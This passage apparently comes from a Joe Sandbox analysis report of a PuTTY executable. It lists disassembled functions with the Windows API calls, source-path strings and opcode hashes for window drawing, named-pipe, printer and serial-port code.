                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: EnumLocalesSystem
                                                          • String ID:
                                                          • API String ID: 2099609381-0
                                                          • Opcode ID: d122edcbc26bee5b69e2d4f8776d71035b21db19d598f63d4e6ef9683ca7e8df
                                                          • Instruction ID: 845791268dd8c651f00cb3a4648e533797275e99ef48892178dd496d57735a9a
                                                          • Opcode Fuzzy Hash: d122edcbc26bee5b69e2d4f8776d71035b21db19d598f63d4e6ef9683ca7e8df
                                                          • Instruction Fuzzy Hash: A9F06DB2B04A4693E704EB19E8905A6E361FB88780F849135DA5D83765CF3DD851D306
                                                          Function 00007FF738A6CBA0 Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: AsyncSelectrecv
                                                          • String ID:
                                                          • API String ID: 3881473523-0
                                                          • Opcode ID: 1c06fb5d00c53c34f8d1b9cc23d4f5a988b921eff0a4b67d89dd1ef79185e64f
                                                          • Instruction ID: 566eb54b40978beee02e3f6ef9375a071ecc3c40b71d0f6d08e0b44ebe4fe8f9
                                                          • Opcode Fuzzy Hash: 1c06fb5d00c53c34f8d1b9cc23d4f5a988b921eff0a4b67d89dd1ef79185e64f
                                                          • Instruction Fuzzy Hash: 76F0AF56B0D28690FB31A729F086769EB806B49B88F880429CB8C0B351DD2F92469725
                                                          Function 00007FF738A3CB10 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: KeyboardState
                                                          • String ID:
                                                          • API String ID: 1724228437-0
                                                          • Opcode ID: c3fed2cf3e02143b62575bd9ecaaf594c1a3955102270c0e3787eea6dc793077
                                                          • Instruction ID: 38a8e1cf80c1354f68376a329cf4fd536cc3fac4afda14611bcc7c3b55ceb9af
                                                          • Opcode Fuzzy Hash: c3fed2cf3e02143b62575bd9ecaaf594c1a3955102270c0e3787eea6dc793077
                                                          • Instruction Fuzzy Hash: 9BF05823A1E592A1F6A1BB28ECA1BEBE2A0AF48704F840131C5CD06690CD3EE585E754
                                                          Function 00007FF738A39B00 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Iconic
                                                          • String ID:
                                                          • API String ID: 110040809-0
                                                          • Opcode ID: 2662ea45c520d1fa8c14777c0c88b5775de1a06d2f7bf777bf7fbbf6ffcaa5c1
                                                          • Instruction ID: 44d12e98d98475f3768955f0b0922e5c4696afab6ee70b5e7401e2b662659429
                                                          • Opcode Fuzzy Hash: 2662ea45c520d1fa8c14777c0c88b5775de1a06d2f7bf777bf7fbbf6ffcaa5c1
                                                          • Instruction Fuzzy Hash: 1BE09A53B8E512A2E654AB22FC806A5C390EB9A750F8C4031CD8C4B394EE7ADC82A314
                                                          Function 00007FF738A319B6 Relevance: 40.4, APIs: 21, Strings: 2, Instructions: 165windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Object$Select$CaretClipCreateDeletePaintPaletteRectStock$BeginBrushExcludeHideIntersectRealizeRectangleShowSolid
                                                          • String ID: !wgs->wintw_hdc$/home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/window.c
                                                          • API String ID: 4109966220-1893345581
                                                          • Opcode ID: 1b093da95bd7b1b7c36555ee21692e0e79dee92f709a95bb6887089b6c2166b9
                                                          • Instruction ID: 98b2323b9034051284f9f65027b7768b9efa3b2249bbd3e79e58160548a389da
                                                          • Opcode Fuzzy Hash: 1b093da95bd7b1b7c36555ee21692e0e79dee92f709a95bb6887089b6c2166b9
                                                          • Instruction Fuzzy Hash: 3161A0777092969BD7A4EB12E414AAAF7A5FB89B80F804035DE4A43B44DF3DE840DB04
                                                          Function 00007FF738AD9A40 Relevance: 38.6, APIs: 13, Strings: 9, Instructions: 127filepipeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF738AD9C8B), ref: 00007FF738AD9B07
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF738AD9C8B), ref: 00007FF738AD9B0F
                                                          • WaitNamedPipeA.KERNEL32 ref: 00007FF738AD9B22
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF738AD9C8B), ref: 00007FF738AD9B29
                                                            • Part of subcall function 00007FF738AFA0EC: _set_error_mode.LIBCMT ref: 00007FF738AFA113
                                                            • Part of subcall function 00007FF738A73820: GetCurrentProcessId.KERNEL32 ref: 00007FF738A73860
                                                            • Part of subcall function 00007FF738A73820: OpenProcess.KERNEL32 ref: 00007FF738A73872
                                                            • Part of subcall function 00007FF738A73820: GetLastError.KERNEL32 ref: 00007FF738A738C3
                                                            • Part of subcall function 00007FF738A73820: LocalAlloc.KERNEL32 ref: 00007FF738A738E8
                                                            • Part of subcall function 00007FF738A73820: GetLengthSid.ADVAPI32 ref: 00007FF738A7391A
                                                            • Part of subcall function 00007FF738A73820: CopySid.ADVAPI32 ref: 00007FF738A7393E
                                                            • Part of subcall function 00007FF738A73820: CloseHandle.KERNEL32 ref: 00007FF738A73964
                                                            • Part of subcall function 00007FF738A73820: CloseHandle.KERNEL32 ref: 00007FF738A73974
                                                            • Part of subcall function 00007FF738A73820: LocalFree.KERNEL32 ref: 00007FF738A73982
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF738AD9C8B), ref: 00007FF738AD9B8E
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF738AD9C8B), ref: 00007FF738AD9B94
                                                            • Part of subcall function 00007FF738A74050: FormatMessageA.KERNEL32(?,?,?,?,?,?,?,00000000,00007FF738A69A4B), ref: 00007FF738A740FB
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF738AD9C8B), ref: 00007FF738AD9BCE
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF738AD9C8B), ref: 00007FF738AD9BD4
                                                          • EqualSid.ADVAPI32(?,?,?,?,?,?,?,?,00000030,00007FF738AD9C8B), ref: 00007FF738AD9C20
                                                          • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF738AD9C8B), ref: 00007FF738AD9C2F
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF738AD9C8B), ref: 00007FF738AD9C3A
                                                          • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF738AD9C8B), ref: 00007FF738AD9C45
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: CloseErrorHandleLast$Local$Free$Process$AllocCopyCreateCurrentEqualFileFormatLengthMessageNamedOpenPipeWait_set_error_mode
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/named-pipe-client.c$Error waiting for named pipe '%s': %s$Owner of named pipe '%s' is not us$Unable to get named pipe security information: %s$Unable to get user SID: %s$Unable to open named pipe '%s': %s$\\.\pipe\$strchr(pipename + 9, '\\') == NULL$strncmp(pipename, "\\\\.\\pipe\\", 9) == 0
                                                          • API String ID: 1091246219-3213421229
                                                          • Opcode ID: 03ff6ff310a2032def80096cefde3ec4e2fe4599037a9136210999e613ba9e64
                                                          • Instruction ID: 39c7055b242766e6ef8684a829a3c20d076731a68c019a9c2a68d38ebf52ed65
                                                          • Opcode Fuzzy Hash: 03ff6ff310a2032def80096cefde3ec4e2fe4599037a9136210999e613ba9e64
                                                          • Instruction Fuzzy Hash: E6517F23A1DA43A1FA00BB21A865779E360BF85B90FC44231DD1E437E4DF7EE405A329
                                                          Function 00007FF738A772C0 Relevance: 31.6, APIs: 8, Strings: 10, Instructions: 59libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00007FF738A72B00: LoadLibraryA.KERNELBASE ref: 00007FF738A72B29
                                                          • GetProcAddress.KERNEL32(?,?,00000000,00000000,00007FF738A77222), ref: 00007FF738A77308
                                                          • GetProcAddress.KERNEL32(?,?,00000000,00000000,00007FF738A77222), ref: 00007FF738A7731B
                                                          • GetProcAddress.KERNEL32(?,?,00000000,00000000,00007FF738A77222), ref: 00007FF738A7732E
                                                          • GetProcAddress.KERNEL32(?,?,00000000,00000000,00007FF738A77222), ref: 00007FF738A77341
                                                          • GetProcAddress.KERNEL32(?,?,00000000,00000000,00007FF738A77222), ref: 00007FF738A77354
                                                          • GetProcAddress.KERNEL32(?,?,00000000,00000000,00007FF738A77222), ref: 00007FF738A77367
                                                          • GetProcAddress.KERNEL32(?,?,00000000,00000000,00007FF738A77222), ref: 00007FF738A7737A
                                                          • GetProcAddress.KERNEL32(?,?,00000000,00000000,00007FF738A77222), ref: 00007FF738A7738D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$LibraryLoad
                                                          • String ID: ClosePrinter$EndDocPrinter$EndPagePrinter$EnumPrintersA$OpenPrinterA$StartDocPrinterA$StartPagePrinter$WritePrinter$spoolss.dll$winspool.drv
                                                          • API String ID: 2238633743-2130675966
                                                          • Opcode ID: f25f850b1c7cd987eef54693d8e7f2d9fa2397c46d03ffd31ddd717b1a9debfd
                                                          • Instruction ID: eea1ea145cd82e31c70e03c8f7195a7b20ecb7bfa5dca9b592a234b235a3fe28
                                                          • Opcode Fuzzy Hash: f25f850b1c7cd987eef54693d8e7f2d9fa2397c46d03ffd31ddd717b1a9debfd
                                                          • Instruction Fuzzy Hash: F4310BA6A0DE13A0FA05BB10F8903A5F390AF44781FC05635C85E06660DFBE6945E36E
                                                          Function 00007FF738A3CCC0 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 89windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Window$Long$CheckItemMenuZoomed$ClientDesktopInfoMonitorRect_set_error_mode
                                                          • String ID: $($/home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/window.c$IsZoomed(wgs->term_hwnd)
                                                          • API String ID: 4273497163-1076784108
                                                          • Opcode ID: 5d9108e0fa9a898b726c1f67bbb7664b43e7ca14a01aae682c6736eb41e690e6
                                                          • Instruction ID: 154bf4fdb26941722ea6768b7138791a7ee00ba5bd9e4a72ef820c6d48a9225b
                                                          • Opcode Fuzzy Hash: 5d9108e0fa9a898b726c1f67bbb7664b43e7ca14a01aae682c6736eb41e690e6
                                                          • Instruction Fuzzy Hash: 4541D563B0964292EB60AB25F84076AF360FFC9B90F904231DA4D43798DF3EE445D714
                                                          Function 00007FF738A73660 Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 85libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,00000000,?,00000000,?,?,00007FF738A73C3A), ref: 00007FF738A736A5
                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,00000000,?,00000000,?,?,00007FF738A73C3A), ref: 00007FF738A736D2
                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,00000000,?,00000000,?,?,00007FF738A73C3A), ref: 00007FF738A736FF
                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,00000000,?,00000000,?,?,00007FF738A73C3A), ref: 00007FF738A7372C
                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,00000000,?,00000000,?,?,00007FF738A73C3A), ref: 00007FF738A73759
                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,00000000,?,00000000,?,?,00007FF738A73C3A), ref: 00007FF738A73782
                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,00000000,?,00000000,?,?,00007FF738A73C3A), ref: 00007FF738A737A7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: GetSecurityInfo$GetTokenInformation$InitializeSecurityDescriptor$OpenProcessToken$SetEntriesInAclA$SetSecurityDescriptorOwner$SetSecurityInfo$advapi32.dll
                                                          • API String ID: 190572456-1260934078
                                                          • Opcode ID: b3a4325b7f6acce72ba734056146a59321e39b8a6d4f87d21b44b00a88f8f423
                                                          • Instruction ID: 599906b4a7009a38c3a98a1800a1a84d14c054bf07da4dff544f11b89fb9e3a1
                                                          • Opcode Fuzzy Hash: b3a4325b7f6acce72ba734056146a59321e39b8a6d4f87d21b44b00a88f8f423
                                                          • Instruction Fuzzy Hash: E641B7A6A0EB43B0FE55EB64E895738E290BF45744FC50635D40E51A60EF7EA804B33E
                                                          Function 00007FF738A5B7D0 Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 239COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: LocalTimewcsftime
                                                          • String ID: %08zx%*s$ (%zu byte%s omitted)$ (%s)$ on behalf of downstream #%u$#0x%lx, $%02x$%Y-%m-%d %H:%M:%S$%s packet $%s raw data at %s$Incoming$Outgoing$XX$type %d / 0x%02x (%s)
                                                          • API String ID: 2400502282-2889948183
                                                          • Opcode ID: 330590ca725553cc791bbb042739855b99999faf6d0f4cc7d28091b9d64a54db
                                                          • Instruction ID: 3edcec350f82cfe34dd3633627d616b1d53e607fa3375f95b554d2e5e6d33cd2
                                                          • Opcode Fuzzy Hash: 330590ca725553cc791bbb042739855b99999faf6d0f4cc7d28091b9d64a54db
                                                          • Instruction Fuzzy Hash: CBA11AA3A0E687A1EA20AB10E4517B9F3D0AF45785FC41132CE8D07755EF7EE186D329
                                                          Function 00007FF738A5AAC0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 118registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Window$Create$ColorText$ClassCompatibleDeleteExtentFontIndirectInfoParametersPoint32RectRegisterShowSystem
                                                          • String ID: %dx%d$SizeTipClass
                                                          • API String ID: 2854742871-2531271423
                                                          • Opcode ID: 9f7ef97a4dc203c239ff9e7297de1ab2d18e6c25262c31996300e102c0bc0f55
                                                          • Instruction ID: 190bed461715bcc648415b89c31953ad48a7b67a47f7f820bc0991710825a4ed
                                                          • Opcode Fuzzy Hash: 9f7ef97a4dc203c239ff9e7297de1ab2d18e6c25262c31996300e102c0bc0f55
                                                          • Instruction Fuzzy Hash: FD518673A0878396EB50AB11F8547AAF760FB89740F904236D98D43B64DF3DE884D715
                                                          Function 00007FF738A5AE28 Relevance: 24.1, APIs: 16, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Object$SelectText$ColorPaintWindow$BeginBrushClientCreateDeleteLengthRectRectangleSolidStock
                                                          • String ID:
                                                          • API String ID: 3492845075-0
                                                          • Opcode ID: 6ae3bfd5975a3f0efe71ac6aa72c5d3408d39c777c70dc819746f3fa71bd9005
                                                          • Instruction ID: 85af228585f09428c0105b1686762ecff1d703c8d478e943f8052a439540d451
                                                          • Opcode Fuzzy Hash: 6ae3bfd5975a3f0efe71ac6aa72c5d3408d39c777c70dc819746f3fa71bd9005
                                                          • Instruction Fuzzy Hash: E93172A6B095039BDA44EB12F85463AE761FB8ABD1F804131DD0E03B68DE3EE8459B15
                                                          Function 00007FF738A644E0 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 117COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: CommState
                                                          • String ID: Configuring %s$Configuring %s flow control$Configuring %s parity$Configuring %u data bits$Configuring baud rate %lu$Configuring serial port: %s$Configuring serial timeouts: %s$Invalid number of stop bits (need 1, 1.5 or 2)
                                                          • API String ID: 4071006776-1037083001
                                                          • Opcode ID: a3c2e508619e9dfd4fb88e62e2991e3b6141950d6d84390ff33067a4bd6ddaf9
                                                          • Instruction ID: 530f10f589fbfca2fd4d2f74bb606a2d67aa270d7103cff007ae9507c9906a70
                                                          • Opcode Fuzzy Hash: a3c2e508619e9dfd4fb88e62e2991e3b6141950d6d84390ff33067a4bd6ddaf9
